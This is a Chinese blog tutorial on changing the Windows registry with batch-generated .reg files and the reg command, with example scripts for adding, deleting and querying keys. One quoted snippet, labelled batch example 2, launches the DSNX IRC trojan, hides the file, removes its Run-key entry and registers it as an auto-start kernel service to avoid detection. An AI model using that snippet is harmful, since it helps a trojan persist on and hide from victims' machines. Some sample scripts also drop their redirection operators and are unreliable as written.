一，批处理生成.Reg文件操作注册表
　　用批处理中的重定向符号可以轻松地生成.reg文件。然后用命令执行.reg文件即可!
　　这里，着重要了解.reg文件操作注册表的方法。
　　首先.reg文件首行必须是：Windows Registry Editor Version 5.00。然后才是操作注册表的内容。
　　(就和从注册表中导出的文件格式一致)

　　1，创建子项
　　Windows Registry Editor Version 5.00
　　[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]

　　在HKEY_LOCAL_MACHINE\SOFTWARE\下创建了一个名字为“TTT”的子项。

　　2，创建一个项目名称
复制代码 代码如下:
　　Windows Registry Editor Version 5.00
　　[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
　　"Name"="TTT BLOG"
　　"EMail"="taoether@gmail.com"
　　"URL"="http://www.taoyoyo.net/ttt/"
　　"Type"=dword:02

　　这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]下新建了:Name、EMail、 URL、Type这四个项目
　　Name、Email、URL的类型是“String Value”
　　Type的类型是“DWORD Value”

　　(附：windows注册表值类型：
　　REG_SZ 字符串值
　　REG_BINARY 二进制值
　　REG_DWORD DWORD值
　　REG_MULTI_SZ 多字符串值
　　REG_EXPAND_SZ 可扩充字符串值)

　　3，修改键值
　　修改相对来说比较简单，只要把你需要修改的项目导出，然后用记事本进行修改，然后导入（regedit /s）即可。就象新建一样即可。可以一次修改同一子项下的多个项目。

　　4，删除项目名称
复制代码 代码如下:
　　Windows Registry Editor Version 5.00
　　[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
　　"EMail"=-

　　执行该脚本，"EMail"就被删除了；

　　5，删除子项
复制代码 代码如下:
　　Windows Registry Editor Version 5.00
　　[-HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
　　[-HKEY_LOCAL_MACHINE\SOFTWARE\DDD]

　　执行该脚本，子项ttt和ddd就已经被删除了。

　　6，.reg文件执行方法
　　1)直接执行reg文件
　　2)regedit /s *.reg (/s不用确认)
　　3)reg import *.reg

　　7，其实，我们也可以用dll文件代替reg文件。

　　批处理例1：
复制代码 代码如下:
　　@echo off
　　echo Windows Registry Editor Version 5.00 >t1.reg
　　echo.
　　echo [HKEY_LOCAL_MACHINE\SOFTWARE\TTT] t1.reg
　　echo "Name"="TTT BLOG" t1.reg
　　echo "EMail"="taoether@gmail.com" t1.reg
　　echo "URL"="http://www.taoyoyo.net/ttt/" t1.reg
　　echo "Type"=dword:02 t1.reg
　　regedit /s t1.reg
　　del /q t1.reg
　　pause

　　批处理2：(这个例子是别人的，不是很懂的说~~)
　　我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启 动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例 (名为windrv32.exe)
复制代码 代码如下:
　　@start windrv32.exe
　　@attrib +h +r windrv32.exe
　　@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] patch.dll
　　@echo "windsnx "=- patch.dll
　　@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
　　@regedit /s patch.dll
　　@delete patch.dll
　　@REM [删除DSNXDE在注册表中的启动项，用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读，并config为自启动]
　　@REM 这样不是更安全^_^.


　　二，reg命令操作注册表

　　Reg命令是Windows提供的一下专门操作注册表的工具。可以方便的查询，添加，删除，导入，导出，比较等操作。具体可以参考系统自带的帮助……

REG Operation [参数列表]
Operation [ QUERY | ADD | DELETE | COPY |
SAVE | LOAD | UNLOAD | RESTORE |
COMPARE | EXPORT | IMPORT ]

　　1，查询所有子项和值
　　
D:\>reg query hklm\software\TTT

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\TTT
Name REG_SZ TTT BLOG
EMail REG_SZ taoether@gmail.com
URL REG_SZ http://www.taoyoyo.net/ttt/
Type REG_DWORD 0x2

　　2，查询特定项

D:\>reg query hklm\software\ttt /v url

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\ttt
url REG_SZ http://www.taoyoyo.net/ttt/

　　这里最难的是如何取得我们想要的字符串呢，困惑了好长时间，终于找到方法了。
　　原来也没有别的好办法，只能用find，for循环来截取我们需要的内容。(下面的例子如果看不懂，请参考本博客另外的文章：DOS循环-bat/批处理for命令详解之二)
　　例如我们要得到url的键值： http://www.taoyoyo.net/ttt/，可以用以下脚本：
复制代码 代码如下:
　　@ECHO OFF
　　for /f "tokens=1,2,3,4,*" %%i in ('reg query "HKEY_LOCAL_MACHINE\software\ttt" ^| find /i "URL"') do SET "pURL=%%k"
　　echo TTT BLOG的URL值为：%pURL%

　　保存为Test.bat，运行结果如下：

D:\>test.bat
TTT BLOG的URL值为：http://www.taoyoyo.net/ttt/

　　不行了，家里的电脑不知为啥，在命令行中一运行“REG”命令(包括reg /?)，CPU就占用100%，看任务管理器，CMD占用百分之八十多，不知道为啥……
　　运行其他的命令就没有问题，包括regedit /s……

　　查了一下，网上有说是中了木马的原因，但查了一下，也不象。既没有找到相关文件，而且运行其它的命令时，没有问题……
　　先不搞了，正好手头有个REG命令详解，等会整理一下!

　　因为查毒，用自己做的Clear.bat清理了一下C盘，居然清理出1个G的空间来，原来只剩几百兆了……windows的垃圾真是多啊~~不要忘了经常清理一下啊!

　　再发布两个做好的批处理文件，可以自动监控OutLook Express，有需要的可以点击下载……
　　1，OEMonitorCount.bat　功能：可以重设注册表中OE打开次数，避免超过100次时提示压缩
　　2，OEMonitorSize.bat　功能：可以监控Outlook Express邮件文件(*.dbx)大小，当大于指定大小时，生成报警日志。

　　这两个文件，可以加到启动组里，每次开机自动运行!
　　搞这两个主要是为了解决公司经常出现的一些问题：
　　1)经常有人的邮件文件超过几个G；
　　2)有时而且根据提示压缩后，可能出现邮件丢失。

　　刚发现，下载后的文件又加了“htm"的后缀，请去掉此后缀再使用!
　　另外下载时，请使用下面的链接，如：千脑电信高速下载地址、千脑网通高速下载地址。上面的VIP链接是专供千脑用户使用的~~